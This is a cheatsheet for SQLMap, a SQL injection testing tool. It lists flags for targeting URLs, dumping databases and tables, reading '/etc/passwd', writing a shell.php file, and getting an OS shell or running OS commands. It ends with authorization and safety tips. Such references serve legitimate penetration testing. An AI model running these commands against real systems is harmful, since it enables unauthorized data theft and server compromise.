SQLMap Cheatsheet

Table of Contents

• Basic Commands
• Target Specification
• Request Settings
• Enumeration Options
• Database Operations
• Advanced Features
• Best Practices

Basic Commands

1. Basic Syntax

   sqlmap -u <url>           # Basic URL scan
   sqlmap -r request.txt     # Scan from request file
   sqlmap --wizard          # Interactive wizard mode

2. Verbosity Levels

   sqlmap -v 1              # Show basic messages
   sqlmap -v 2              # Show database queries
   sqlmap -v 3              # Show HTTP requests
   sqlmap -v 4              # Show HTTP responses
   sqlmap -v 5              # Show HTTP response content
   sqlmap -v 6              # Show more details

Target Specification

sqlmap -u "http://target.com/page.php?id=1"   # Direct URL
sqlmap -u "http://target.com/" --data="id=1"  # POST data
sqlmap --urls=urls.txt                        # Multiple URLs

sqlmap -r request.txt    # From request file
sqlmap -l logs.txt      # From log file
sqlmap -m targets.txt   # Multiple targets
sqlmap -g "inurl:php?id=" # Google dork

Request Settings

# Authentication
sqlmap --cookie="PHPSESSID=123"     # Set cookie
sqlmap --auth-type="Basic"          # Auth type
sqlmap --auth-cred="user:pass"      # Credentials

# Headers and Methods
sqlmap --headers="X-Forwarded-For: 127.0.0.1"
sqlmap --method=POST                # Force POST method
sqlmap --random-agent              # Random User-Agent

Enumeration Options

1. Database Enumeration

   sqlmap -u <url> --dbs            # List databases
   sqlmap -u <url> --tables         # List tables
   sqlmap -u <url> --columns        # List columns
   sqlmap -u <url> --schema         # Database schema

2. Specific Database Info

   sqlmap -u <url> -D dbname --tables      # Tables in database
   sqlmap -u <url> -D dbname -T table --columns  # Columns in table
   sqlmap -u <url> -D dbname -T table -C cols --dump  # Dump data

3. System Information

   sqlmap -u <url> --os             # Operating system info
   sqlmap -u <url> --is-dba         # Check DBA privileges
   sqlmap -u <url> --privileges     # List user privileges

Database Operations

# Basic Extraction
sqlmap -u <url> --dump          # Dump all databases
sqlmap -u <url> --dump-all      # Dump everything
sqlmap --sql-query="SELECT version()"  # Custom query

# Specific Data
sqlmap -D db -T users --dump    # Dump specific table
sqlmap --dump-format=CSV        # CSV output format

# Optimization
sqlmap --threads=10             # Multiple threads
sqlmap --time-sec=10           # Response time
sqlmap --level=5               # Detection level (1-5)
sqlmap --risk=3                # Risk level (1-3)

Advanced Features

# File System Access
sqlmap --file-read="/etc/passwd"   # Read files
sqlmap --file-write="shell.php"    # Write files
sqlmap --os-shell                  # Get OS shell
sqlmap --os-cmd=whoami            # Execute OS command

# Injection Techniques
sqlmap --technique=BEUSTQ          # Specific techniques
sqlmap --union-cols=10            # UNION query columns
sqlmap --tamper=space2comment     # Use tamper scripts

Best Practices

• Always obtain proper authorization before testing
• Start with low risk levels and increase gradually
• Use appropriate verbosity levels for your needs
• Save scan results for documentation
• Monitor system resources during scans
• Respect rate limiting and server loads
• Keep SQLMap updated to the latest version

Safety Tips

1. Before Testing

   • Verify target scope and permissions
   • Test in development environments first
   • Create backups if possible
   • Start with minimal invasive tests

2. During Testing

   • Monitor server responses
   • Use appropriate time delays
   • Document all findings
   • Stop if unexpected behavior occurs

Additional Resources

• SQLMap Official Documentation
• SQLMap GitHub Repository
• SQLMap Wiki